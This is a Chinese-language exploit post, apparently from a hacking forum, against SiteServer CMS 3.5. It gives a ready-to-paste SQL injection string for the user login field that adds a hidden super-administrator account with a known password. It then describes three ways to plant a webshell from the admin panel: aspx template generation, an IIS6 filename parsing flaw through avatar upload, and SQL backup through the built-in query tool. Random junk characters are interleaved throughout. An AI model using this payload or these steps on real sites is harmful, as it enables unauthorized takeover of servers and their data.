经测试秒杀最新的3.5版
; d# |0 n3 e) n ~' f+ o; Estieserver官网:www.siteserver.cn4 h9 a1 X2 H$ L( f8 g" o3 {$ T
EXP:* l' S; t8 L4 A- C+ c: t) {
直接访问UserCenter/login.aspx
! W* H5 z: J# t: [& {/ O用户名处输入:
; P" r& `2 }1 ?0 p, @% B/ q. r" o7 S/ O1 v0 H
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–+ R8 l- @: B1 c7 g- D4 U! w2 }
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
% H9 Q6 p' _4 t* {, K9 `: B" d之后再访问后台SiteServer/login.aspx用插入的用户登陆
* k# T1 i ]% C/ n7 s后台拿webshell的三种方法:) R" W+ z* ^3 |
一、* `* b7 }' p5 M; a- Q( x5 e; e
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
# d. G; f% M2 A2 b1 c二、
- q6 }8 q2 x, F* h成员权限-》添加用户-》用户名为:1.asp
( W3 B- b/ m' Bhttp://127.0.0.1/usercenter/
; ~2 [ k5 N- B" L1 }( Z用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell! K' U9 N6 P) R( W
(ps:后台添加用户时不会验证是否含有非法字符)
7 N5 \9 s+ U! z9 w三、
' x: x+ f: u8 x系统工具-》实用工具-》机器参数查看
7 r4 {8 I3 _. C& n" X可以看到数据库类型、名称,WEB路径
/ D' G! U' z" ~5 z" ~5 o9 |: F4 k4 b% V系统工具-》数据库工具-》SQL语句查询) `0 ? M- _6 y8 ]0 B$ Z; P
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |